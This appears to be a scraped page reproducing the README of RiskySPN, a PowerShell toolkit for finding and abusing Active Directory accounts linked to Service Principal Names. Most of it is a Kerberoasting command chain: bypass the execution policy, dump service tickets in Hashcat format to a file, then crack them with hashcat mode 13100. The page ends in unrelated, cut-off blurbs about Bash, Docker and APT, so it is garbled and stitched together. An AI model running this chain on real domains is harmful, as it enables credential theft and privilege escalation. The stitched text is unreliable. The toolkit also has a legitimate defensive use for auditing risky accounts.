RiskySPN is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.
Import-Module .\RiskySPNs.psm1 IEX from the web). .\Find-PotentiallyCrackableAccounts.ps1 Make sure Set-ExecutionPolicy is Unrestricted or Bypass
Get-Help Get-TGSCipher -Full All functions also have the -Verbosemode
Find-PotentiallyCrackableAccounts Sensitive + RC4 = $$$
Export-PotentiallyCrackableAccounts Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433" Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3 Introduction Variables are one of the most important basics of Bash scripting. A variable is…
Introduction Running a Bash script in Linux is a basic but important skill for anyone…
Introduction Writing your first Bash script in Linux is one of the best ways to…
Docker has become one of the most important tools in modern software development. If you…
The APT Command Linux users rely on is one of the most powerful tools for…
Ubuntu users usually install software through .deb packages or the APT package manager. However, some…